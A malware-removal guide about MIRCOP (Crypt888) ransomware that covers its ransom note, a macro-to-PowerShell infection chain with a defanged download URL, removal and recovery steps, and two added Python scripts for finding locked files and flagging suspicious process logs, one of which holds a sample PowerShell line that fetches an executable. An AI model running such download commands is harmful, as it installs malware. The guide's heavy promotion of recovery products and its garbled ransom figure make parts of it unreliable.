
Remove MIRCOP Ransomware virus (Improved Instructions) - Oct 2016 update

Removal by Julie Splinters | Also known as Crypt888 | Type: Ransomware

MIRCOP ransomware – the “Anonymous” copycat

While ordinary ransomware viruses focus on attacking ordinary users’ personal information, some of them, such as the MIRCOP virus (also known as Microcop or Crypt888 ransomware), act as if the hackers themselves were the victims. However, this does not lessen the destructiveness of this particular virus. It has a few distinctive features which make the MIRCOP virus stand out from the majority of recent threats. For example, the virus demands an unbelievably huge ransom. In this article, we present the vital information about this malware and the ways to remove the MIRCOP virus from your computer. Keep in mind that automatic antivirus utilities such as Reimage Cleaner or Intego come in handy when eliminating such infections from infected devices.


The hackers behind Crypt888 ransomware seem to have taken a liking to the Internet hacktivist group called “Anonymous.” Judging by the ransom note, it may seem that the creators of the ransomware belong to this organization. Nevertheless, it may well be that the virus owners only impersonate the group to appear more respectable, while their real relation to it is highly questionable. The note goes as follows:

You’ve stolen 48.48 BTC from the wrong people, please be so kind to return them and we will return your files.
Don’t take us for fools, we know more about you than you know about yourself.
Pay us back and we won’t take further action, don’t pay and be prepared.

The screenshot of MIRCOP ransomware

Just below the note, the hackers give a Bitcoin address to which the victim is told to send 48.48 BTC, i.e., more than 28,00.00 USD! Luckily, no financial transactions have been made to this account so far, but the drama typical of “Anonymous” messages puts a lot of pressure on the victims. If your company’s data has come under MIRCOP’s attack, do not consider paying up, as there are absolutely no guarantees that the cyber criminals will be kind enough to return the locked data. Instead, you should focus on MIRCOP removal. In addition, you might try data recovery programs, such as PhotoRec or R-studio, or go to the end of this article to find other data recovery recommendations.

As for the other peculiarities of this ransomware, the infection seems to be related to another file-locking cyber threat called .Locked, which was launched a couple of months before MIRCOP. It also used the same “Anonymous” trademark logo – Guy Fawkes’s mask – and appended a similar extension. In this case, the virus attaches the extension “Lock.” in front of the corrupted folder. For example, the files will be encoded as Lock.My Pictures or Lock.My Documents. Lastly, the cyber criminals try to pressure the users into paying by blackmailing them, as if the victims had stolen money from unknown “very important” people. The MIRCOP threat is surely one of the novelties among recent ransomware.
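To scope the damage, the “Lock.” prefix described above can be inventoried before any cleanup. The script below is an added example, not code from this article or from any vendor tool; it assumes that the modification time of a prefixed entry roughly marks when it was locked, which helps when choosing a restore point or backup that predates the infection.

```python
import os
from datetime import datetime, timezone
from pathlib import Path

LOCK_PREFIX = "Lock."  # prefix the article says MIRCOP puts in front of names

def scan_locked(root):
    """Walk root and describe every entry whose name starts with LOCK_PREFIX."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            if not name.startswith(LOCK_PREFIX) or name == LOCK_PREFIX:
                continue
            path = Path(dirpath) / name
            original = name[len(LOCK_PREFIX):]
            hits.append({
                "path": path,
                "original_name": original,
                # An intact sibling with the original name suggests a
                # coincidental match rather than a locked victim file.
                "sibling_exists": (Path(dirpath) / original).exists(),
                "mtime": path.stat().st_mtime,
            })
    return hits

def encryption_window(hits):
    """Earliest and latest mtime (UTC) of likely victims, or None if none."""
    # Assumption: mtime approximates the moment the entry was locked.
    times = [h["mtime"] for h in hits if not h["sibling_exists"]]
    if not times:
        return None
    def as_utc(ts):
        return datetime.fromtimestamp(ts, tz=timezone.utc)
    return as_utc(min(times)), as_utc(max(times))

if __name__ == "__main__":
    import sys
    found = scan_locked(sys.argv[1] if len(sys.argv) > 1 else ".")
    for h in sorted(found, key=lambda h: h["mtime"]):
        label = "check" if h["sibling_exists"] else "locked"
        print(f"{label:6} {h['path']}")
    print("window:", encryption_window(found))
```

Run it against a user profile or share, passing the folder as the first argument; entries marked "check" have an unprefixed twin and deserve a manual look.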

The screenshot of MIRCOP ransomware note 2

Another interesting and concerning feature of this virus is that it does not limit itself to file encryption: it also steals users’ login credentials from various browsers and social networking applications such as Skype. Similar techniques have already been used by other ransomware, for instance CryptXXX. This is especially useful if the malware creators decide to blackmail the users by threatening to expose their private information to the public. Also, some of the collected information may be sensitive enough to be used to break into the victims’ bank accounts and steal money from them directly.

How do hackers plant this ransomware on the victims’ computers?

Reportedly, Crypt888 is distributed via a malicious spam campaign. The targeted users receive a fake Thai customs declaration form. It is a Word document which contains an embedded malicious macro. If macros are enabled by default on the computer, the malicious macro uses Windows PowerShell to download and set up the virus on the computer. It is now clear that the virus downloads the infectious script from the suspicious address hxxp://www[.]blushy[.]nl/u/putty.exe, which, interestingly enough, redirects to a Dutch online adult shop.

Later on, the virus downloads three main files which are responsible for the rest of the havoc on the computer: c.exe, which steals information, and x.exe and y.exe, which encode the personal files. Imitating official institutions to convince users to open infected attachments is quite a popular strategy among ransomware developers. Remain very cautious when opening and downloading attachments of such emails. Always keep in mind that the credentials of an official company do not necessarily mean that the email is legitimate. In addition, you should improve the overall protection of the computer by installing a trustworthy anti-spyware program which will not only block the malware but also decrease the number of received spam emails.
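The chain described above (Word document, macro, PowerShell download, then c.exe, x.exe and y.exe) can be hunted for in process-creation logs. The following is an added example, not part of the original article: the records are constructed, their field names follow Sysmon process-creation events, and the host, user and folder names are placeholders.

```python
import re
from ntpath import basename  # parses Windows paths on any OS

OFFICE_PARENTS = {"winword.exe"}              # article: the lure is a Word document
SHELLS = {"powershell.exe"}                   # article: the macro runs PowerShell
PAYLOAD_NAMES = {"c.exe", "x.exe", "y.exe"}   # article: stealer and two encryptors
URL_EXE = re.compile(r"https?://\S+?\.exe\b", re.IGNORECASE)

# Constructed records; field names follow Sysmon process-creation events.
# Hosts, users and folders are placeholders, not indicators from the article.
EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "CommandLine": r'WINWORD.EXE /n "C:\Users\a\Downloads\declaration.doc"'},
    {"ParentImage": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Invoke-WebRequest "
                    "http://files.example.test/u/putty.exe -OutFile p.exe"},
    {"ParentImage": r"C:\Users\a\AppData\Local\Temp\p.exe",
     "Image": r"C:\Users\a\AppData\Local\Temp\c.exe", "CommandLine": "c.exe"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Get-ChildItem"},
    {"ParentImage": r"C:\Users\a\AppData\Local\Temp\p.exe",
     "Image": r"C:\Users\a\AppData\Local\Temp\x.exe", "CommandLine": "x.exe"},
]

def triage(events):
    """Return (index, finding) pairs for records that match the described chain."""
    findings = []
    for i, ev in enumerate(events):
        child = basename(ev["Image"]).lower()
        parent = basename(ev["ParentImage"]).lower()
        if parent in OFFICE_PARENTS and child in SHELLS:
            findings.append((i, "office-spawned-powershell"))
            if URL_EXE.search(ev["CommandLine"]):
                findings.append((i, "powershell-fetches-exe"))
        # A bare file name is a weak signal; report it for correlation only.
        if child in PAYLOAD_NAMES:
            findings.append((i, "payload-name:" + child))
    return findings

if __name__ == "__main__":
    for index, finding in triage(EVENTS):
        print(index, finding, EVENTS[index]["Image"])
```

The Office-to-PowerShell parentage is the strongest signal here; the three payload names are short and generic, so treat a name match as a lead to correlate with the other findings.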

Recommendations for the MIRCOP removal: 

The first thing to do when you are infected with the MIRCOP virus is to run a system scan with a malware removal application: antivirus, anti-spyware or anti-malware. If one of these programs fails to eliminate the virus, you can try another. Eventually, one utility will take care of the threat and remove MIRCOP from your PC. Unfortunately, this method does not help decrypt the locked files. You might try retrieving them with the help of the previously mentioned data recovery applications or reconstruct them from a backup copy. If you do not have one, make sure you create one for your future files. It is not difficult to back up valuable information using the backup function of the operating system. Please note that this must be done only AFTER the MIRCOP removal. If you still cannot run the respective programs or launch some essential OS functions, feel free to use the recovery guidelines presented below and run the system scan once again.


To remove MIRCOP Ransomware virus, follow these steps:

Remove MIRCOP Ransomware using Safe Mode with Networking

  • Step 1: Reboot your computer to Safe Mode with Networking

    Windows 7 / Vista / XP
    1. Click Start → Shutdown → Restart → OK.
    2. When your computer becomes active, start pressing F8 multiple times until you see the Advanced Boot Options window.
    3. Select Safe Mode with Networking from the list.

    Windows 10 / Windows 8
    1. Press the Power button at the Windows login screen. Now press and hold Shift on your keyboard and click Restart.
    2. Now select Troubleshoot → Advanced options → Startup Settings and finally press Restart.
    3. Once your computer becomes active, select Enable Safe Mode with Networking in the Startup Settings window.
  • Step 2: Remove MIRCOP Ransomware

    Log in to your infected account and start the browser. Download Reimage Cleaner, Intego or another legitimate anti-spyware program. Update it before running a full system scan, then remove the malicious files that belong to the ransomware to complete MIRCOP Ransomware removal.

If the ransomware is blocking Safe Mode with Networking, try the next method.

Remove MIRCOP Ransomware using System Restore

  • Step 1: Reboot your computer to Safe Mode with Command Prompt

    Windows 7 / Vista / XP
    1. Click Start → Shutdown → Restart → OK.
    2. When your computer becomes active, start pressing F8 multiple times until you see the Advanced Boot Options window.
    3. Select Command Prompt from the list.

    Windows 10 / Windows 8
    1. Press the Power button at the Windows login screen. Now press and hold Shift on your keyboard and click Restart.
    2. Now select Troubleshoot → Advanced options → Startup Settings and finally press Restart.
    3. Once your computer becomes active, select Enable Safe Mode with Command Prompt in the Startup Settings window.
  • Step 2: Restore your system files and settings
    1. Once the Command Prompt window shows up, enter cd restore (without quotes) and press Enter.
    2. Now type rstrui.exe (without quotes) and press Enter again.
    3. When a new window shows up, click Next and select a restore point dated before the infiltration of MIRCOP Ransomware. After doing that, click Next.
    4. Now click Yes to start the system restore.
    Once you have restored your system to a previous date, download Reimage Cleaner or Intego, scan your computer with it and make sure that MIRCOP Ransomware removal has been performed successfully.

Bonus: Recover your data

The guide presented above is supposed to help you remove MIRCOP Ransomware from your computer. To recover your encrypted files, we recommend using a detailed guide prepared by security experts.

Though this virus was a mystery to virus experts for quite some time, there is finally a breakthrough in its decryption. AVG has released a Crypt888 decryptor, which can be downloaded from the official AVG website or by clicking the previously indicated link. If, however, your device is infected with some new virus variant and the decryption tool is incapable of recovering your files, you can try the instructions below.

If your files are encrypted by MIRCOP Ransomware, you can use several methods to restore them:

Data Recovery Pro instructions for MIRCOP data recovery

Data Recovery Pro is data recovery software designed to recover accidentally lost data, but it may as well be used to bypass the MIRCOP encryption and retrieve your files. You can try this method using the instructions below:

  • Download Data Recovery Pro;
  • Follow the steps of Data Recovery Setup and install the program on your computer;
  • Launch it and scan your computer for files encrypted by MIRCOP Ransomware;
  • Restore them.

How to use Windows Previous Versions feature for the data recovery after MIRCOP encryption

The Windows Previous Versions feature is rather easy to use. All the steps you should take are provided below. However, do not forget that this feature is only functional if the System Restore function was enabled before the infiltration. If it wasn’t, you can skip the following instructions and move on to other data recovery methods.

  • Find an encrypted file you need to restore and right-click on it;
  • Select “Properties” and go to “Previous versions” tab;
  • Here, check each of available copies of the file in “Folder versions”. You should select the version you want to recover and click “Restore”.

Instructions for data recovery using ShadowExplorer

ShadowExplorer can be a useful feature for restoring data locked by less complex ransomware. Though it may not work for MIRCOP in particular, we still recommend you to try it out and perhaps you will manage to get at least a few of your personal files back.

  • Download Shadow Explorer;
  • Follow a Shadow Explorer Setup Wizard and install this application on your computer;
  • Launch the program and go through the drop down menu on the top left corner to select the disk of your encrypted data. Check what folders are there;
  • Right-click on the folder you want to restore and select “Export”. You can also select where you want it to be stored.

Crypt888 decryptor method

The best and most guaranteed way of recovering your data is by using the Crypt888 decryptor. Just download the program and follow the further instructions provided by its developers.

Finally, you should always think about protection against crypto-ransomware. In order to protect your computer from MIRCOP Ransomware and other ransomware, use a reputable anti-spyware program, such as Reimage Cleaner, Intego, SpyHunter 5, Combo Cleaner or Malwarebytes.


Back up files for later use in case of a malware attack

Computer users can suffer various losses due to cyber infections or their own mistakes. Software issues created by malware or direct data loss due to encryption can lead to problems with your device or permanent damage. When you have proper up-to-date backups, you can easily recover after such an incident and get back to work.

It is crucial to update your backups after any changes on the device, so that you can get back to the point you were working at when malware changes something or issues with the device cause data or performance corruption. Make file backup a daily or weekly habit.

When you have the previous version of every important document or project, you can avoid frustration and breakdowns. This comes in handy when malware strikes out of nowhere. Use Data Recovery Pro for system restoration purposes.

About the author
Julie Splinters - Malware removal specialist


  1. Miranda says:
    June 28th, 2016 at 2:32 am

    I wonder what does the real Anonymous think about these viruses? Or are they the culprits?

  2. Theodore says:
    June 28th, 2016 at 2:33 am

    Finally, something new.

  3. Faye says:
    June 28th, 2016 at 2:33 am

    Who would pay such money?

  4. Orwell5 says:
    June 28th, 2016 at 2:34 am

    Let's watch the show.

  5. Eliza says:
    June 28th, 2016 at 2:35 am

    Interesting. It seems that the big fish made its appearance.
